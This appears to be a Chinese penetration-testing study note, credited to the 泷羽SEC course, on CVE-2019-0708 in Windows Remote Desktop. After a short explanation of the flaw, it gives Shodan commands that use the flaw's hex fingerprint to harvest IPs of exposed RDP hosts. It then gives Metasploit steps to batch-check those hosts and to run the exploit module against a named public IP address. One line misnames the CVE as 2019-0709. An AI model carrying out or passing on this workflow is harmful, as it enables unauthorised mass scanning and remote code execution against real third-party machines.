注:本文章源于泷羽SEC,如有侵权请联系我,违规必删
学习请认准泷羽SEC学习视频:https://space.bilibili.com/350329294
实验一:search 存在CVE-2019-0708的网络设备
CVE - 2019 - 0708**漏洞:**
-
该漏洞存在于远程桌面服务(以前称为终端服务)中,是一个远程执行代码漏洞。其利用方式是通过远程桌面端口3389,借助RDP协议进行攻击。这个漏洞在身份认证检查方面存在问题,攻击者可绕过认证,无需任何的交互,直接通过rdp协议进行连接并发送恶意代码执行命令到服务器中去1。
-
在漏洞相关函数(如IcaRebindVirtualChannels和IcaBindVirtualChannels中的IcaFindChannelByName函数)的分析中发现,例如在termdd!_IcaBindChannel的栈针对特定地址(88fd5738),存在参数差异(第3个参数第一次是0x1f,而第二次是3),这表明channel绑定了两个ID,存在两个引用,这一情况被利用于漏洞攻击中,修复时可强制指定为0x1f来防止这种问题1。
在CVE - 2019 - 0709漏洞场景下,攻击者通过上述原理将恶意的有效载荷利用RDP协议发送到目标系统,从而达到在目标系统执行任意代码的目的,例如可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。
核心
每个cve漏洞都有其特定的指纹,通过搜索漏洞指纹特征进行漏洞的挖掘,一定要学会举一反三
加油少年,反正一无所有 何惧 从头再来
查询语句:
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
十六进制字符串绕过(类似指纹方式查找),该字符串就是cve-2019-0708的十六进制漏洞特征
总结shodan命令download和parse
shodan download 0708 --limit 100 --fields ip_str port:3389 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
#这里会将搜索的信息下载到0708文件中
#然后使用parse解析文件并且重定向到0708.txt文件中
shodan parse --fields ip_str '/home/kali/0708.json.gz'>0708.txt
#然后可以使用msfconsole对0708.txt进行批量扫描
内容过于敏感,不图片演示,使用时依次往下 msfconsole #启动msf search 0708 #从漏洞库中查询cve-2019-0708漏洞 use 3 #这里可以使用模块的ID,也可以使用模块的名字 show options #显示选项 set rhosts file:'/home/kali/0708.txt' #这里是进行文档的批量扫描如果单个扫描是 set rhosts 扫描的ip check #进行扫描,查看是否存在漏洞
msfconsole 检测单个ip
use 3 #选择攻击模块ID show options #显示选项 set rhosts 77.61.106.233 #设置目标ip show targets #列出受到漏洞影响目标系统的类型: set target 5 #选择攻击类型的ID run #运行此攻击类型